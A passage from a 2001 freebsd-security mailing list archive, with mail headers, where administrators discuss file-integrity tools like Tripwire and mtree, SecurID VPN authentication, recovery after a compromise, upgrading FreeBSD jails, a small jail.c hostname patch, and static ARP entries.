2001, Garrett Wollman wrote: > > > Is there a reason to use md5, sha1, and ripemd160 together? I would think > > ripemd160digest alone would be sufficient. > > Of course. If someone breaks one of the crypto hash algorithms, it is > likely that the discovery will not be immediately applicable to other > algorithms, so the other checksums will still be of some value. > > (Hmmm. I wonder how susceptible these hash algorithms are to quantum > computation...?) > > -GAWollman > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE637EDv8Bofna59hYRAwqxAKCMIv618djie1lLNu2svERd5dseHACcDeFp Gu/gh/I5OVPM4UemRhWpBoU= =lxVG -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 22: 0:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from cessium.prosolve.com (gw.prosolve.com [63.225.188.140]) by hub.freebsd.org (Postfix) with ESMTP id 3043E37B422 for ; Thu, 19 Apr 2001 22:00:41 -0700 (PDT) (envelope-from SeanM@prosolve.com) Received: from fs01.prosolve.com (fs01.prosolve.com [172.16.128.50]) by cessium.prosolve.com (8.11.1/8.11.1) with ESMTP id f3K50Ti56479; Thu, 19 Apr 2001 22:00:29 -0700 (PDT) Received: by fs01.prosolve.com with Internet Mail Service (5.5.2650.21) id <28Z1MGPN>; Thu, 19 Apr 2001 22:00:29 -0700 Message-ID: From: Sean Mathias To: "'Jason DiCioccio'" , Emre Bastuz , freebsd-security@FreeBSD.ORG Subject: RE: Tripwire or the like for FreeBSD ? Date: Thu, 19 Apr 2001 22:00:28 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hopefully I am not being too dense, but what about the Tripwire-1.2 in = the security ports? SM -----Original Message----- From: Jason DiCioccio [mailto:geniusj@bluenugget.net] Sent: Thursday, April 19, 2001 8:05 PM To: Emre Bastuz; freebsd-security@FreeBSD.ORG Subject: Re: Tripwire or the like for FreeBSD ? couldn't you could easily hack something up using mtree? ----- Original Message ----- From: "Emre Bastuz" To: Sent: Thursday, April 19, 2001 12:30 PM Subject: Tripwire or the like for FreeBSD ? > Hi, > > I was just wondering if there is Tripwire for FreeBSD or some decent = tool > that has similar/better functionality ? > > The Tripwire homepage seems to bee pretty commercial and lacks a BSD > version (they seem to be focused on Linux). > > I found something called "Aide" in the ports directory, but to be = honest - > I don=B4t trust a "Version 0.7" when it comes to security. > > Does anyone know any alternative ? > > Regards, > > Emre > > -- > Emre Bastuz > info@emre.de http://www.emre.de > UIN: 561260 PGP Key ID: 0xAFAC77FD > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 0:32:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from nameserver.austclear.com.au (nameserver.austclear.com.au [192.83.119.132]) by hub.freebsd.org (Postfix) with ESMTP id 8DE7837B43C; Fri, 20 Apr 2001 00:32:32 -0700 (PDT) (envelope-from ahl@austclear.com.au) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.70.1]) by nameserver.austclear.com.au (8.9.3/8.9.3) with ESMTP id RAA66115; Fri, 20 Apr 2001 17:32:31 +1000 (EST) Received: from tungsten (tungsten [192.168.70.1]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id RAA15105; Fri, 20 Apr 2001 17:32:31 +1000 (EST) Message-Id: <200104200732.RAA15105@tungsten.austclear.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: "Otter" Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: remote SecureID authentication anyone? In-Reply-To: Message from "Otter" of "Thu, 19 Apr 2001 21:12:41 -0400." <000201c0c936$ffec3120$1400a8c0@zoso> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 20 Apr 2001 17:32:31 +1000 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org otterr@telocity.com said: > I'm looking to setup a machine in our office so a few of us can get in > on a VPN for network access after hours from home. I've heard VPNs are > possible. After discussing this with office management, they say the > only way we can do this is to use security in addition to passwords. > When I asked if our SecureID cards/keychains would work, they agreed > on it. Now... has anyone got this setup or something similar? I looked > on the mailing list archives with no luck... searched some web > pages... I even remember ssh2 using it, but now I don't see any > reference to it in the openssh or ssh2 makefiles. Answers and/or > suggestions are greatly appreciated. To some extent this depends what you're intending to use for your VPN. The SecurID server can be configured to handle RADIUS authentication, so any VPN software that can do RADIUS can do SecurID. Tony -- Tony Landells Senior Network Engineer Ph: +61 3 9677 9319 Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 Level 4, Rialto North Tower 525 Collins Street Melbourne VIC 3000 Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 0:47:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-060.resnet.wisc.edu [146.151.42.60]) by hub.freebsd.org (Postfix) with ESMTP id F085B37B424 for ; Fri, 20 Apr 2001 00:47:22 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 25499 invoked by uid 1000); 20 Apr 2001 07:47:21 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 20 Apr 2001 07:47:21 -0000 Date: Fri, 20 Apr 2001 02:47:21 -0500 (CDT) From: Mike Silbersack To: Brian Tiemann Cc: Subject: Re: maxusers In-Reply-To: <3ADF2757.DF2C0A88@packeteer.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 19 Apr 2001, Brian Tiemann wrote: > Would it be a horrible idea to change the name of the key in the > config file? Maybe to something less likely to cause this (very common > and > understandable) error-- like, say, RSRCLIM (resource limit)? > > Brian Changing MAXUSERS to something else would probably just aggravate a lot of people and not help much. A better solution (which has already been done for the mbuf system) is to turn the setting MAXUSERS into tuneables that can be set in loader.conf. And once that's complete, it leaves the door open for someone to add auto-tuning based on ram size. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 1:34:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from gwdu42.gwdg.de (gwdu42.gwdg.de [134.76.10.26]) by hub.freebsd.org (Postfix) with ESMTP id 0B62837B42C for ; Fri, 20 Apr 2001 01:34:33 -0700 (PDT) (envelope-from rbeer@uni-goettingen.de) Received: from partner.uni-psych.gwdg.de ([134.76.136.114]) by gwdu42.gwdg.de with esmtp (Exim 3.14 #22) id 14qWN3-0000L7-00 for freebsd-security@freebsd.org; Fri, 20 Apr 2001 10:34:29 +0200 Mime-Version: 1.0 X-Sender: rbeer@popper.gwdg.de Message-Id: In-Reply-To: References: Date: Fri, 20 Apr 2001 10:34:21 +0200 To: freebsd-security@freebsd.org From: Ragnar Beer Subject: RE: Tripwire or the like for FreeBSD ? Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anybody looked at http://sourceforge.net/projects/tripwire/ ? There's a GPL'd version (2.3.1-2) of Tripwire. I got the impression that over mtree Tripwire has the advantage of a more finegrained control. Ragnar >Hopefully I am not being too dense, but what about the Tripwire-1.2 in the >security ports? > >SM > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 2:11:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from redlance.singingtree.com (pool.207.151.148.221.cinenet.net [207.151.148.221]) by hub.freebsd.org (Postfix) with ESMTP id 3BFA437B422 for ; Fri, 20 Apr 2001 02:11:14 -0700 (PDT) (envelope-from mikey@singingtree.com) Received: from localhost (mikey@localhost) by redlance.singingtree.com (8.11.3/8.11.2) with ESMTP id f3K9Ar841964 for ; Fri, 20 Apr 2001 02:11:09 -0700 (PDT) (envelope-from mikey@singingtree.com) Date: Fri, 20 Apr 2001 02:10:53 -0700 (PDT) From: "Michael A. Dickerson" To: freebsd-security@freebsd.org Subject: Re: Tripwire or the like for FreeBSD ? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Garrett Wollman" wrote > (Hmmm. I wonder how susceptible these hash algorithms are to quantum > computation...?) Not very--at least, no publicly known research suggests that quantum computers will be immediately useful against hash algorithms. The only published quantum algorithm relevant to cryptography (that I know of) is for factoring large numbers in polynomial time. (Sorry, couldn't resist commenting as I just finished my thesis on quantum computing and Fourier transforms!) M.D. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 4:42:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 2151137B424 for ; Fri, 20 Apr 2001 04:42:22 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id EAA15820; Fri, 20 Apr 2001 04:41:33 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda15818; Fri Apr 20 04:41:30 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3KBfNT03011; Fri, 20 Apr 2001 04:41:23 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdxa3009; Fri Apr 20 04:41:01 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3KBf0D10127; Fri, 20 Apr 2001 04:41:00 -0700 (PDT) Message-Id: <200104201141.f3KBf0D10127@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdn10118; Fri Apr 20 04:40:06 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Dag-Erling Smorgrav Cc: Peter Pentchev , "David G. Andersen" , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process In-reply-to: Your message of "19 Apr 2001 12:37:10 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 20 Apr 2001 04:40:06 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Dag-Erling Smorgrav writes: > Peter Pentchev writes: > > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote: > > > It's not either/or. The only acceptable solution to this situation is > > > a complete reinstall from a trusted source (e.g. original CD set). > > ..and during the install, examine your backups > > A backup is not a trusted source. Never reinstall from backups after > a compromise. Restoring user data from backup is acceptable as long > as you are certain that none of that data is executable. Even then you cannot trust user data because there is no way to know whether it has been modified. For example if the user data is financial you MUST hire an auditor to verify that the data is correct. If you can ABSOLUTELY establish when the compromise occurred, restoring user data and the rest of the system from that point would be acceptable. However, in most cases you will not be able to ABSOLUTELY establish when the compromise occurred, so you have to suspect ABSOLUTELY everything on the machine. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 4:43:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 457EF37B424 for ; Fri, 20 Apr 2001 04:43:51 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id EAA15830; Fri, 20 Apr 2001 04:43:33 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda15828; Fri Apr 20 04:43:31 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3KBhPU03019; Fri, 20 Apr 2001 04:43:25 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdRJ3016; Fri Apr 20 04:42:59 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3KBgxM10140; Fri, 20 Apr 2001 04:42:59 -0700 (PDT) Message-Id: <200104201142.f3KBgxM10140@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdT10136; Fri Apr 20 04:42:41 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Raoul Schroeder Cc: Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process In-reply-to: Your message of "Thu, 19 Apr 2001 11:02:24 EDT." <3ADEFE00.812EA0A3@gmx.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 20 Apr 2001 04:42:41 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <3ADEFE00.812EA0A3@gmx.net>, Raoul Schroeder writes: > > > > Take your system off the net and check it for signs of intrusion. > > > > Kris > > Just a quick question: How does one check for signs of intrusion. The FreeBSD > handbook does not really talk a lot about this. > Is there a good documentation about this? Install an IDS immediately after installation, then use it. This is not a 100% solution but IMO one of the better solutions in your toolkit. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 6:58:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from stargate.compuware.com (stargate.compuware.com [166.90.248.158]) by hub.freebsd.org (Postfix) with SMTP id 87A1C37B422; Fri, 20 Apr 2001 06:58:04 -0700 (PDT) (envelope-from Bill.Barkell@compuware.com) Received: from [199.186.16.12] by stargate.compuware.com via smtpd (for hub.freebsd.org [216.136.204.18]) with SMTP; 20 Apr 2001 13:58:04 UT Received: from bh1.compuware.com (compuware.com [172.22.1.239]) by cwus-dtw-mr02.compuware.com (Postfix) with ESMTP id 1667B74EF6; Fri, 20 Apr 2001 09:58:03 -0400 (EDT) Received: by bh1.compuware.com with Internet Mail Service (5.5.2653.19) id ; Fri, 20 Apr 2001 09:58:02 -0400 Message-ID: From: "Barkell, Bill" To: 'Tony Landells' , Otter Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG Subject: RE: remote SecureID authentication anyone? Date: Fri, 20 Apr 2001 09:57:58 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Secure ID can be set up for VPN in the following manner: (there may be other ways as well) 1) VPN gateway is connected to internet 2) SecureID ACE server is set up on internal network 3) VPN gateway is told to pass authentication to the ACE server Client connects to the gateway, conversation takes place between the gateway and the ACE server, gateway grants access to client. This does work with several popular VPN gateway products. William Barkell Network Security Analyst Corporate Information Systems Compuware Corporation 31440 Northwestern Highway Farmington Hills, MI 48334 -----Original Message----- From: Tony Landells [mailto:ahl@austclear.com.au] Sent: Friday, April 20, 2001 3:33 AM To: Otter Cc: questions@FreeBSD.ORG; security@FreeBSD.ORG Subject: Re: remote SecureID authentication anyone? otterr@telocity.com said: > I'm looking to setup a machine in our office so a few of us can get in > on a VPN for network access after hours from home. I've heard VPNs are > possible. After discussing this with office management, they say the > only way we can do this is to use security in addition to passwords. > When I asked if our SecureID cards/keychains would work, they agreed > on it. Now... has anyone got this setup or something similar? I looked > on the mailing list archives with no luck... searched some web > pages... I even remember ssh2 using it, but now I don't see any > reference to it in the openssh or ssh2 makefiles. Answers and/or > suggestions are greatly appreciated. To some extent this depends what you're intending to use for your VPN. The SecurID server can be configured to handle RADIUS authentication, so any VPN software that can do RADIUS can do SecurID. Tony -- Tony Landells Senior Network Engineer Ph: +61 3 9677 9319 Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355 Level 4, Rialto North Tower 525 Collins Street Melbourne VIC 3000 Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 8: 1:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id 6578537B424 for ; Fri, 20 Apr 2001 08:01:48 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id XAA87307; Fri, 20 Apr 2001 23:04:08 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Fri, 20 Apr 2001 23:04:34 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <827788228.20010420230434@morning.ru> To: kj Cc: freebsd-security@FreeBSD.ORG Subject: Re: jail upgrade In-Reply-To: <20010418184305.A18763@indifference.org> References: <20010418184305.A18763@indifference.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org k> Hey, all. k> I have two jails on my server. k> When I do a make world on the actual OS, does it matter if I upgrade the k> jails as well? I don't think so... imho, jails run application software basically -- so, it's okay... nevertheless, nothing could really prevent you from creating some script upgrading executables with keeping their jail's original modes, I deem. (Just seeking through specified dirs and comparing EXEs or just theirs sizes/mtimes) k> I have changed a lot of file/dir permissions and so on, and k> would rather just leave the jail file systems alone. I am just wondering k> if I don't upgrade the jails, would things start to break? k> Thanks, k> K.J. p.s. I have written a patch to jail.c which allows starting a jail with symbolic names instead of IP-addr in decimal dotten notation. I do keep /etc/hosts where symbolic names are being translated, so it's rather comfortable to setup jails, and firewalls for them. Here it is: 18a19,25 > #include > #include > #include > #include > #include > #include > 37,38c44,60 < if (!i) < errx(1, "Couldn't make sense of ip-number\n"); --- > if (!i) { > /* check if it is resolveable */ > struct hostent *hp; > hp = gethostbyname(argv[3]); > if (!hp) { > errx(1, "Couldn't make sense of the jail address\n"); > } > else { > char **p = hp->h_addr_list; > if (p[1]) { > errx(1, "Jail should have only one ip-address > associated with\n"); > } > else { > memcpy(&in.s_addr, p[0], sizeof(in.s_addr)); > } > } > } -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 9:44:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 3692337B42C for ; Fri, 20 Apr 2001 09:44:16 -0700 (PDT) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA08415; Fri, 20 Apr 2001 10:43:15 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id KAA14162; Fri, 20 Apr 2001 10:43:13 -0600 (MDT) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15072.26401.630643.257226@nomad.yogotech.com> Date: Fri, 20 Apr 2001 10:43:13 -0600 (MDT) To: Cy Schubert - ITSD Open Systems Group Cc: Raoul Schroeder , Kris Kennaway , fukuda shinichi , freebsd-security@FreeBSD.ORG Subject: Re: unknown process In-Reply-To: <200104201142.f3KBgxM10140@cwsys.cwsent.com> References: <3ADEFE00.812EA0A3@gmx.net> <200104201142.f3KBgxM10140@cwsys.cwsent.com> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > Take your system off the net and check it for signs of intrusion. > > > > > > Kris > > > > Just a quick question: How does one check for signs of intrusion. The FreeBSD > > handbook does not really talk a lot about this. > > Is there a good documentation about this? > > Install an IDS immediately after installation, then use it. This is > not a 100% solution but IMO one of the better solutions in your toolkit. Unfortunately, the most common IDS out there require your machine be more 'open' than necessary. (ie; you leave the system open, and it closes them down with firewall entries, rather than just leaving the non-used ports closed down.) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 9:57:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from home.cg.nu (home.cg.nu [213.196.2.115]) by hub.freebsd.org (Postfix) with ESMTP id 366F437B440 for ; Fri, 20 Apr 2001 09:57:19 -0700 (PDT) (envelope-from henk@home.cg.nu) Received: from kpnlep (cg.nu [62.163.140.117]) by home.cg.nu (Postfix) with SMTP id 88B6F15918E for ; Fri, 20 Apr 2001 18:57:16 +0200 (CEST) Reply-To: From: "Henk Wevers" Cc: Subject: RE: jail upgrade Date: Fri, 20 Apr 2001 18:57:16 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <827788228.20010420230434@morning.ru> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I update a jail like this make a new jail lets call it JAIL. cd JAIL rm -rf etc/ var/run var/log var/db/locate.database var/db/mouttab #leave port.mkversion alone! rm -rf root/ usr/share/ kill the jail you want to update, the jail should not be active while updating!! cp -Rp JAIL/* /where/your/jail/is/* Restart the jail again. If you are upgrading from FreeBSD 4.1x early and FreeBSD 4.2-? also update the /etc/pam.conf. Henk Wevers Working on http://jailnotes.cg.nu (please give comments) -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Igor Podlesny Sent: vrijdag 20 april 2001 18:05 To: kj Cc: freebsd-security@FreeBSD.ORG Subject: Re: jail upgrade k> Hey, all. k> I have two jails on my server. k> When I do a make world on the actual OS, does it matter if I upgrade the k> jails as well? I don't think so... imho, jails run application software basically -- so, it's okay... nevertheless, nothing could really prevent you from creating some script upgrading executables with keeping their jail's original modes, I deem. (Just seeking through specified dirs and comparing EXEs or just theirs sizes/mtimes) k> I have changed a lot of file/dir permissions and so on, and k> would rather just leave the jail file systems alone. I am just wondering k> if I don't upgrade the jails, would things start to break? k> Thanks, k> K.J. p.s. I have written a patch to jail.c which allows starting a jail with symbolic names instead of IP-addr in decimal dotten notation. I do keep /etc/hosts where symbolic names are being translated, so it's rather comfortable to setup jails, and firewalls for them. Here it is: 18a19,25 > #include > #include > #include > #include > #include > #include > 37,38c44,60 < if (!i) < errx(1, "Couldn't make sense of ip-number\n"); --- > if (!i) { > /* check if it is resolveable */ > struct hostent *hp; > hp = gethostbyname(argv[3]); > if (!hp) { > errx(1, "Couldn't make sense of the jail address\n"); > } > else { > char **p = hp->h_addr_list; > if (p[1]) { > errx(1, "Jail should have only one ip-address > associated with\n"); > } > else { > memcpy(&in.s_addr, p[0], sizeof(in.s_addr)); > } > } > } -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 10:12:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from obelix.rby.hk-r.se (obelix.rby.hk-r.se [194.47.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 4F06737B43F for ; Fri, 20 Apr 2001 10:12:38 -0700 (PDT) (envelope-from t98pth@student.bth.se) Received: from helios.kna.hk-r.se (helios [194.47.153.5]) by obelix.rby.hk-r.se (8.10.2/8.10.2) with ESMTP id f3KHCaM16325 for ; Fri, 20 Apr 2001 19:12:36 +0200 (MEST) Received: from localhost (t98pth@localhost) by helios.kna.hk-r.se (8.9.3+Sun/8.9.3) with ESMTP id TAA27421 for ; Fri, 20 Apr 2001 19:13:14 +0200 (MEST) X-Authentication-Warning: helios.kna.hk-r.se: t98pth owned process doing -bs Date: Fri, 20 Apr 2001 19:13:14 +0200 (MEST) From: =?ISO-8859-1?Q?P=E4r_Thoren?= X-Sender: t98pth@helios To: freebsd-security@freebsd.org Subject: static arp values Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! Is it possible to make a arptable entry static? For example the arp adress of my gateway. So that man-in-the-middle attack can be prevented. I=B4ve tried "arp -S ip-adres mac-adres" but it seems that it is still possible to infect the arptable with a false mac adress of the gateway and sniff the connection. /P=E4r To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 10:54:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from uadvg135.cms.usa.net (uadvg135.cms.usa.net [165.212.11.135]) by hub.freebsd.org (Postfix) with SMTP id 0C86E37B423 for ; Fri, 20 Apr 2001 10:54:37 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 6765 invoked from network); 20 Apr 2001 17:54:35 -0000 Received: from uadvg129.cms.usa.net (165.212.11.129) by corprelay.cms.usa.net with SMTP; 20 Apr 2001 17:54:35 -0000 Received: (qmail 14059 invoked by uid 0); 20 Apr 2001 17:54:34 -0000 Received: USA.NET MXFirewall, messaging filters applied; Fri, 20 Apr 2001 17:54:33 GMT Received: from packeteer.com [207.78.98.2] by uadvg129 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 491FDTR3G0330M20; Fri, 20 Apr 2001 17:54:33 GMT Message-ID: <3AE0780F.BAF16352@packeteer.com> Date: Fri, 20 Apr 2001 10:55:27 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> <3ADF92DC.2B5A941D@packeteer.com> <20010419194710.A58378@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Okay-- I've solved this problem (for the edification of the rest who are in my boat) by cvsupping back to RELENG_4_2_0_RELEASE, applying the glob patch, rebuilding and reinstalling /usr/src/lib/libc and /usr/src/libexec/ftpd, and then cvsupping back to RELENG_4. Just a curiosity point, though... would I have been able to do a make buildworld, then make install only /usr/src/lib/libc? Just trying to see if that would have been a viable alternative that I could recommend to others... Brian Kris Kennaway wrote: > > On Thu, Apr 19, 2001 at 06:37:32PM -0700, Brian Tiemann wrote: > > I'm just trying to compile /usr/src/lib/libc. I suppose that's not > > going to work-- a make world will be indicated. Which really sucks for a > > production server. > > > > Yikes. And we were so close to making it to 4.3-RELEASE without an > > interim build... > > That's the trade-off you make when you cvsup -stable. If you have > lots of machines to update, or (sensibly) want to test it before > deploying on your production systems, just build world + test one a > scratch machine, then installworld via NFS on the target servers. > > Kris > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 20 10:56: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from zogbe.tasam.com 